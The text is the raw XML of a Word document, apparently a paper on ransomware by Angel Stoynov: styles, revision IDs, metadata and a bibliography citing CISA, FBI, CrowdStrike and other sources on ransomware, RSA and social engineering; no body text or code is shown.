  </w:num>
  <w:num w:numId="5" w16cid:durableId="1113406297">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1349334172">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1281380356">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="511453526">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="201987702">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="774909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7B"/>
    <w:rsid w:val="000048DF"/>
    <w:rsid w:val="000053EC"/>
    <w:rsid w:val="000137C5"/>
    <w:rsid w:val="000243E1"/>
    <w:rsid w:val="0002452F"/>
    <w:rsid w:val="00025D20"/>
    <w:rsid w:val="00045AD6"/>
    <w:rsid w:val="00051862"/>
    <w:rsid w:val="00055544"/>
    <w:rsid w:val="00056026"/>
    <w:rsid w:val="00072C9F"/>
    <w:rsid w:val="000779C9"/>
    <w:rsid w:val="00085708"/>
    <w:rsid w:val="00097ECD"/>
    <w:rsid w:val="000A118C"/>
    <w:rsid w:val="000A2FAB"/>
    <w:rsid w:val="000A54DF"/>
    <w:rsid w:val="000B2FB6"/>
    <w:rsid w:val="000C1E67"/>
    <w:rsid w:val="000C491F"/>
    <w:rsid w:val="000E0366"/>
    <w:rsid w:val="000E2826"/>
    <w:rsid w:val="000E38EA"/>
    <w:rsid w:val="000F15C2"/>
    <w:rsid w:val="000F27A2"/>
    <w:rsid w:val="000F4691"/>
    <w:rsid w:val="000F7709"/>
    <w:rsid w:val="00106AA8"/>
    <w:rsid w:val="00107E62"/>
    <w:rsid w:val="00116D33"/>
    <w:rsid w:val="00121E99"/>
    <w:rsid w:val="00125B35"/>
    <w:rsid w:val="00131F17"/>
    <w:rsid w:val="00142315"/>
    <w:rsid w:val="00147363"/>
    <w:rsid w:val="00151B26"/>
    <w:rsid w:val="001557C7"/>
    <w:rsid w:val="001639B6"/>
    <w:rsid w:val="001649F5"/>
    <w:rsid w:val="00167428"/>
    <w:rsid w:val="0017683C"/>
    <w:rsid w:val="00195EC0"/>
    <w:rsid w:val="001A4310"/>
    <w:rsid w:val="001B3E02"/>
    <w:rsid w:val="001B4B78"/>
    <w:rsid w:val="001C0D46"/>
    <w:rsid w:val="001D45C9"/>
    <w:rsid w:val="001E1F11"/>
    <w:rsid w:val="001E40B5"/>
    <w:rsid w:val="001E6D9E"/>
    <w:rsid w:val="001F1AEB"/>
    <w:rsid w:val="001F7A8E"/>
    <w:rsid w:val="002020B8"/>
    <w:rsid w:val="00203DAB"/>
    <w:rsid w:val="00205FD0"/>
    <w:rsid w:val="00214A7B"/>
    <w:rsid w:val="002152AD"/>
    <w:rsid w:val="00216C71"/>
    <w:rsid w:val="00226248"/>
    <w:rsid w:val="00231BD5"/>
    <w:rsid w:val="00232A99"/>
    <w:rsid w:val="00234B9C"/>
    <w:rsid w:val="00237078"/>
    <w:rsid w:val="002539E6"/>
    <w:rsid w:val="00254A09"/>
    <w:rsid w:val="00255D1F"/>
    <w:rsid w:val="002566EA"/>
    <w:rsid w:val="002579CD"/>
    <w:rsid w:val="00282A0F"/>
    <w:rsid w:val="00287727"/>
    <w:rsid w:val="002952A9"/>
    <w:rsid w:val="002974F0"/>
    <w:rsid w:val="002A38F4"/>
    <w:rsid w:val="002B5E76"/>
    <w:rsid w:val="002C0B17"/>
    <w:rsid w:val="002C6B12"/>
    <w:rsid w:val="002C7B38"/>
    <w:rsid w:val="002F5406"/>
    <w:rsid w:val="002F7C2D"/>
    <w:rsid w:val="00300A73"/>
    <w:rsid w:val="003049E8"/>
    <w:rsid w:val="003234F3"/>
    <w:rsid w:val="003306C7"/>
    <w:rsid w:val="00331C7B"/>
    <w:rsid w:val="00331E30"/>
    <w:rsid w:val="0033715D"/>
    <w:rsid w:val="00337A89"/>
    <w:rsid w:val="003646C6"/>
    <w:rsid w:val="00366161"/>
    <w:rsid w:val="00367D76"/>
    <w:rsid w:val="0037494B"/>
    <w:rsid w:val="003756A3"/>
    <w:rsid w:val="003776F1"/>
    <w:rsid w:val="00382022"/>
    <w:rsid w:val="00386EB1"/>
    <w:rsid w:val="003900D8"/>
    <w:rsid w:val="00392132"/>
    <w:rsid w:val="003936F7"/>
    <w:rsid w:val="003A23D9"/>
    <w:rsid w:val="003A3653"/>
    <w:rsid w:val="003A405B"/>
    <w:rsid w:val="003A5B17"/>
    <w:rsid w:val="003A5BBA"/>
    <w:rsid w:val="003B6B54"/>
    <w:rsid w:val="003C2126"/>
    <w:rsid w:val="003D2F46"/>
    <w:rsid w:val="003D6CE8"/>
    <w:rsid w:val="003E0712"/>
    <w:rsid w:val="003E4D90"/>
    <w:rsid w:val="003F3828"/>
    <w:rsid w:val="00405083"/>
    <w:rsid w:val="00406FC0"/>
    <w:rsid w:val="00436818"/>
    <w:rsid w:val="0043720C"/>
    <w:rsid w:val="00437A39"/>
    <w:rsid w:val="00451424"/>
    <w:rsid w:val="00461FCA"/>
    <w:rsid w:val="004648AB"/>
    <w:rsid w:val="00464C04"/>
    <w:rsid w:val="00465313"/>
    <w:rsid w:val="0047015F"/>
    <w:rsid w:val="00470703"/>
    <w:rsid w:val="004717D9"/>
    <w:rsid w:val="00473542"/>
    <w:rsid w:val="00490AB4"/>
    <w:rsid w:val="0049224F"/>
    <w:rsid w:val="00494EB0"/>
    <w:rsid w:val="00495E67"/>
    <w:rsid w:val="004B30C0"/>
    <w:rsid w:val="004C2732"/>
    <w:rsid w:val="004C28AD"/>
    <w:rsid w:val="004D1EF8"/>
    <w:rsid w:val="004D6012"/>
    <w:rsid w:val="004D689A"/>
    <w:rsid w:val="004E1C1D"/>
    <w:rsid w:val="004E706C"/>
    <w:rsid w:val="004F45C2"/>
    <w:rsid w:val="004F488F"/>
    <w:rsid w:val="00505B76"/>
    <w:rsid w:val="005100E0"/>
    <w:rsid w:val="00514517"/>
    <w:rsid w:val="0051454C"/>
    <w:rsid w:val="00527F5A"/>
    <w:rsid w:val="005409B2"/>
    <w:rsid w:val="005423C2"/>
    <w:rsid w:val="00553D94"/>
    <w:rsid w:val="00561A30"/>
    <w:rsid w:val="00563871"/>
    <w:rsid w:val="00572752"/>
    <w:rsid w:val="00575D22"/>
    <w:rsid w:val="00584DE5"/>
    <w:rsid w:val="005853BC"/>
    <w:rsid w:val="00597AF3"/>
    <w:rsid w:val="005A0955"/>
    <w:rsid w:val="005A6153"/>
    <w:rsid w:val="005B0707"/>
    <w:rsid w:val="005C0285"/>
    <w:rsid w:val="005D10CC"/>
    <w:rsid w:val="005E282A"/>
    <w:rsid w:val="005F0B99"/>
    <w:rsid w:val="005F2CAA"/>
    <w:rsid w:val="005F5DEA"/>
    <w:rsid w:val="0060119F"/>
    <w:rsid w:val="00613567"/>
    <w:rsid w:val="00616A98"/>
    <w:rsid w:val="00624808"/>
    <w:rsid w:val="00624F23"/>
    <w:rsid w:val="00631094"/>
    <w:rsid w:val="00632C8F"/>
    <w:rsid w:val="006342F3"/>
    <w:rsid w:val="00634E4B"/>
    <w:rsid w:val="006359D0"/>
    <w:rsid w:val="00647961"/>
    <w:rsid w:val="006511F1"/>
    <w:rsid w:val="00654DDF"/>
    <w:rsid w:val="006647D3"/>
    <w:rsid w:val="006649B6"/>
    <w:rsid w:val="00677E04"/>
    <w:rsid w:val="00683C23"/>
    <w:rsid w:val="00685A9E"/>
    <w:rsid w:val="006963F5"/>
    <w:rsid w:val="006A1C53"/>
    <w:rsid w:val="006A4850"/>
    <w:rsid w:val="006A49A0"/>
    <w:rsid w:val="006B3E5F"/>
    <w:rsid w:val="006C54F4"/>
    <w:rsid w:val="006D0013"/>
    <w:rsid w:val="006D01C6"/>
    <w:rsid w:val="006D4D8B"/>
    <w:rsid w:val="006D760F"/>
    <w:rsid w:val="006E156F"/>
    <w:rsid w:val="006E45EB"/>
    <w:rsid w:val="006E6E44"/>
    <w:rsid w:val="006F5481"/>
    <w:rsid w:val="006F7F4F"/>
    <w:rsid w:val="00706026"/>
    <w:rsid w:val="0072254E"/>
    <w:rsid w:val="007318EC"/>
    <w:rsid w:val="00743616"/>
    <w:rsid w:val="007636E2"/>
    <w:rsid w:val="00765C8C"/>
    <w:rsid w:val="00770E2D"/>
    <w:rsid w:val="00771189"/>
    <w:rsid w:val="007804F7"/>
    <w:rsid w:val="00794A33"/>
    <w:rsid w:val="00795EDA"/>
    <w:rsid w:val="007A331C"/>
    <w:rsid w:val="007B6A32"/>
    <w:rsid w:val="007B7F08"/>
    <w:rsid w:val="007C209D"/>
    <w:rsid w:val="007C63A0"/>
    <w:rsid w:val="007F1E3F"/>
    <w:rsid w:val="007F3D99"/>
    <w:rsid w:val="007F4ACC"/>
    <w:rsid w:val="00800816"/>
    <w:rsid w:val="00803A1A"/>
    <w:rsid w:val="00804F8B"/>
    <w:rsid w:val="00822711"/>
    <w:rsid w:val="00823414"/>
    <w:rsid w:val="0082697C"/>
    <w:rsid w:val="00847DCF"/>
    <w:rsid w:val="00860839"/>
    <w:rsid w:val="008665FC"/>
    <w:rsid w:val="00870315"/>
    <w:rsid w:val="008874DA"/>
    <w:rsid w:val="008A2B07"/>
    <w:rsid w:val="008C1CB1"/>
    <w:rsid w:val="008D63F9"/>
    <w:rsid w:val="008E4679"/>
    <w:rsid w:val="008F16BC"/>
    <w:rsid w:val="0090117B"/>
    <w:rsid w:val="00903BD9"/>
    <w:rsid w:val="0090561B"/>
    <w:rsid w:val="0090789B"/>
    <w:rsid w:val="009122D0"/>
    <w:rsid w:val="00953056"/>
    <w:rsid w:val="00953CD5"/>
    <w:rsid w:val="00954D13"/>
    <w:rsid w:val="00962853"/>
    <w:rsid w:val="009732FC"/>
    <w:rsid w:val="009B080A"/>
    <w:rsid w:val="009B4086"/>
    <w:rsid w:val="009B462B"/>
    <w:rsid w:val="009C5C68"/>
    <w:rsid w:val="009C6F73"/>
    <w:rsid w:val="009D1559"/>
    <w:rsid w:val="009E0C7C"/>
    <w:rsid w:val="009E432F"/>
    <w:rsid w:val="009E4BB6"/>
    <w:rsid w:val="009F12CE"/>
    <w:rsid w:val="009F3DF7"/>
    <w:rsid w:val="009F7D92"/>
    <w:rsid w:val="00A01C2A"/>
    <w:rsid w:val="00A0406E"/>
    <w:rsid w:val="00A05FA6"/>
    <w:rsid w:val="00A129D7"/>
    <w:rsid w:val="00A46A8E"/>
    <w:rsid w:val="00A46E29"/>
    <w:rsid w:val="00A568DA"/>
    <w:rsid w:val="00A63738"/>
    <w:rsid w:val="00A7037C"/>
    <w:rsid w:val="00A7766E"/>
    <w:rsid w:val="00A801E3"/>
    <w:rsid w:val="00A80F16"/>
    <w:rsid w:val="00A82944"/>
    <w:rsid w:val="00A85F71"/>
    <w:rsid w:val="00A86ADF"/>
    <w:rsid w:val="00A92F77"/>
    <w:rsid w:val="00AA4808"/>
    <w:rsid w:val="00AB4A2B"/>
    <w:rsid w:val="00AC7D80"/>
    <w:rsid w:val="00AF305A"/>
    <w:rsid w:val="00B03E44"/>
    <w:rsid w:val="00B137EB"/>
    <w:rsid w:val="00B20281"/>
    <w:rsid w:val="00B23FDE"/>
    <w:rsid w:val="00B411C5"/>
    <w:rsid w:val="00B456D7"/>
    <w:rsid w:val="00B4639C"/>
    <w:rsid w:val="00B47066"/>
    <w:rsid w:val="00B53532"/>
    <w:rsid w:val="00B55AEF"/>
    <w:rsid w:val="00B63754"/>
    <w:rsid w:val="00B63890"/>
    <w:rsid w:val="00B64DCF"/>
    <w:rsid w:val="00B6751C"/>
    <w:rsid w:val="00B70C11"/>
    <w:rsid w:val="00B72237"/>
    <w:rsid w:val="00B83E8C"/>
    <w:rsid w:val="00B87DAA"/>
    <w:rsid w:val="00BA0B76"/>
    <w:rsid w:val="00BA2498"/>
    <w:rsid w:val="00BA71F4"/>
    <w:rsid w:val="00BB1616"/>
    <w:rsid w:val="00BB2B78"/>
    <w:rsid w:val="00BB54BC"/>
    <w:rsid w:val="00BE07A7"/>
    <w:rsid w:val="00BF1F92"/>
    <w:rsid w:val="00C01F14"/>
    <w:rsid w:val="00C069A1"/>
    <w:rsid w:val="00C06BE8"/>
    <w:rsid w:val="00C072F9"/>
    <w:rsid w:val="00C12960"/>
    <w:rsid w:val="00C12CDE"/>
    <w:rsid w:val="00C17C50"/>
    <w:rsid w:val="00C22906"/>
    <w:rsid w:val="00C3124C"/>
    <w:rsid w:val="00C36261"/>
    <w:rsid w:val="00C40308"/>
    <w:rsid w:val="00C43003"/>
    <w:rsid w:val="00C442CA"/>
    <w:rsid w:val="00C46E85"/>
    <w:rsid w:val="00C6565E"/>
    <w:rsid w:val="00C70CE2"/>
    <w:rsid w:val="00C77792"/>
    <w:rsid w:val="00C85082"/>
    <w:rsid w:val="00C90B23"/>
    <w:rsid w:val="00CA720F"/>
    <w:rsid w:val="00CC04B6"/>
    <w:rsid w:val="00CC0C6D"/>
    <w:rsid w:val="00CC27C0"/>
    <w:rsid w:val="00CC4AD3"/>
    <w:rsid w:val="00CC4B75"/>
    <w:rsid w:val="00CD6DAA"/>
    <w:rsid w:val="00CE664A"/>
    <w:rsid w:val="00CE6ED6"/>
    <w:rsid w:val="00D12FDB"/>
    <w:rsid w:val="00D21146"/>
    <w:rsid w:val="00D2263A"/>
    <w:rsid w:val="00D2359D"/>
    <w:rsid w:val="00D2601D"/>
    <w:rsid w:val="00D27C24"/>
    <w:rsid w:val="00D357BC"/>
    <w:rsid w:val="00D35C6E"/>
    <w:rsid w:val="00D40D36"/>
    <w:rsid w:val="00D44C22"/>
    <w:rsid w:val="00D72E11"/>
    <w:rsid w:val="00D7425C"/>
    <w:rsid w:val="00D86FD0"/>
    <w:rsid w:val="00D91E43"/>
    <w:rsid w:val="00DA7798"/>
    <w:rsid w:val="00DC3280"/>
    <w:rsid w:val="00DC6A30"/>
    <w:rsid w:val="00DD0CF8"/>
    <w:rsid w:val="00DD2032"/>
    <w:rsid w:val="00DE04D0"/>
    <w:rsid w:val="00DE1B16"/>
    <w:rsid w:val="00DE24B3"/>
    <w:rsid w:val="00DE3C06"/>
    <w:rsid w:val="00DF197B"/>
    <w:rsid w:val="00E004ED"/>
    <w:rsid w:val="00E173D3"/>
    <w:rsid w:val="00E26014"/>
    <w:rsid w:val="00E31DE8"/>
    <w:rsid w:val="00E628BE"/>
    <w:rsid w:val="00E71AAE"/>
    <w:rsid w:val="00E864F1"/>
    <w:rsid w:val="00EA2C3E"/>
    <w:rsid w:val="00EA699E"/>
    <w:rsid w:val="00EB3361"/>
    <w:rsid w:val="00EC7B7D"/>
    <w:rsid w:val="00ED2A4F"/>
    <w:rsid w:val="00EF20BE"/>
    <w:rsid w:val="00EF55E1"/>
    <w:rsid w:val="00F01668"/>
    <w:rsid w:val="00F04F17"/>
    <w:rsid w:val="00F10A7D"/>
    <w:rsid w:val="00F10E75"/>
    <w:rsid w:val="00F275C8"/>
    <w:rsid w:val="00F27F4D"/>
    <w:rsid w:val="00F34F35"/>
    <w:rsid w:val="00F370B2"/>
    <w:rsid w:val="00F42C53"/>
    <w:rsid w:val="00F44850"/>
    <w:rsid w:val="00F516C1"/>
    <w:rsid w:val="00F63133"/>
    <w:rsid w:val="00F639D9"/>
    <w:rsid w:val="00F667AC"/>
    <w:rsid w:val="00F66B70"/>
    <w:rsid w:val="00F6753F"/>
    <w:rsid w:val="00F748AE"/>
    <w:rsid w:val="00F86402"/>
    <w:rsid w:val="00F9169A"/>
    <w:rsid w:val="00FA1BAA"/>
    <w:rsid w:val="00FA5B86"/>
    <w:rsid w:val="00FA6CCD"/>
    <w:rsid w:val="00FB0DAF"/>
    <w:rsid w:val="00FB6671"/>
    <w:rsid w:val="00FB7531"/>
    <w:rsid w:val="00FC343E"/>
    <w:rsid w:val="00FC6115"/>
    <w:rsid w:val="00FE0F4D"/>
    <w:rsid w:val="00FF2690"/>
    <w:rsid w:val="00FF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86DA0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{439FB6B1-68DC-4A28-A334-8524C657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52F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52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DE8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52F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DE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A7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2452F"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="bg-BG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452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2452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7ECD"/>
    <w:rPr>
      <w:rFonts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EA2C3E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E4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32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E4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32F"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi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7F3D99"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="2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032"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas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874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37A39"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="codeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00437A39"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:before="240"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="codeChar">
    <w:name w:val="code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="code"/>
    <w:rsid w:val="00437A39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23FD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9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jpe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jpe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github.com/StoynovAngel/PTSK" TargetMode="External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F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
    <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
    <xsd:import namespace="c5dcd230-26b3-4f1e-a7d8-2c2a40be03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eb03e4-fe34-41e0-b148-6c2f228be8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d230-26b3-4f1e-a7d8-2c2a40be033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Sto</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
    <b:Title>#StopRansomware Guide</b:Title>
    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ran</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
    <b:Title>Ransomware </b:Title>
    <b:ProductionCompany>FBI</b:ProductionCompany>
    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Kur22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Baker</b:Last>
            <b:First>Kurt</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>History of Ransomware</b:Title>
    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
    <b:Year>2022</b:Year>
    <b:Month>10</b:Month>
    <b:Day>09</b:Day>
    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Фил20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Петров</b:Last>
            <b:First>Филип</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>RSA</b:Title>
    <b:Year>2020</b:Year>
    <b:Month>02</b:Month>
    <b:Day>16</b:Day>
    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wha25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
    <b:ProductionCompany>Secure W2</b:ProductionCompany>
    <b:Year>2025</b:Year>
    <b:Month>09</b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>arc</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
    <b:Title>archiveus-trojan</b:Title>
    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Spe</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
    <b:Title>Spear phishing</b:Title>
    <b:ProductionCompany>Ibm</b:ProductionCompany>
    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>Matthew Kosinski</b:Corporate>
      </b:Author>
    </b:Author>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gpc</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
    <b:Title>Gpcode</b:Title>
    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Car</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
    <b:Title>Social Engineering</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>University</b:Last>
            <b:First>Carnegie</b:First>
            <b:Middle>Mellon</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bre25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Robb</b:Last>
            <b:First>Brenda</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
    <b:ProductionCompany>BlackFog</b:ProductionCompany>
    <b:Year>2025</b:Year>
    <b:Month>06</b:Month>
    <b:Day>24</b:Day>
    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Spr</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
    <b:Title>Spring Security Crypto Module</b:Title>
    <b:ProductionCompany>Spring</b:ProductionCompany>
    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Бял</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
    <b:Title>Бял заек Ransomware</b:Title>
    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
    <b:Tag>Чов25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
    <b:ProductionCompany>СЕГА</b:ProductionCompany>
    <b:Year>2025</b:Year>
    <b:Month>01</b:Month>
    <b:Day>30</b:Day>
    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
    <b:RefOrder>9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eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074E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5E0E9-ED1E-4DED-B1D8-B99F35F6AB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eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
    <ds:schemaRef ds:uri="c5dcd230-26b3-4f1e-a7d8-2c2a40be03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1CF4A7-B298-49AF-BD69-AB8853A0DC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2A65B6-C891-4DE3-96AA-342988F8CBF9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="16eb03e4-fe34-41e0-b148-6c2f228be8b6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5342</Words>
  <Characters>30451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Stoynov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Stoynov, Angel</cp:lastModifiedBy>
  <cp:revision>29</cp:revision>
  <cp:lastPrinted>2026-03-17T19:35:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-09T19:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-17T19:36:00Z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0x010100EA7F95447AE5CD4A96E24D58484FA3D2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="GrammarlyDocumentId">
    <vt:lpwstr>112a72b4-21fb-4b1a-9da6-06cd4d3a1306</vt:lpwstr>
  </property>
</Properties>
</file>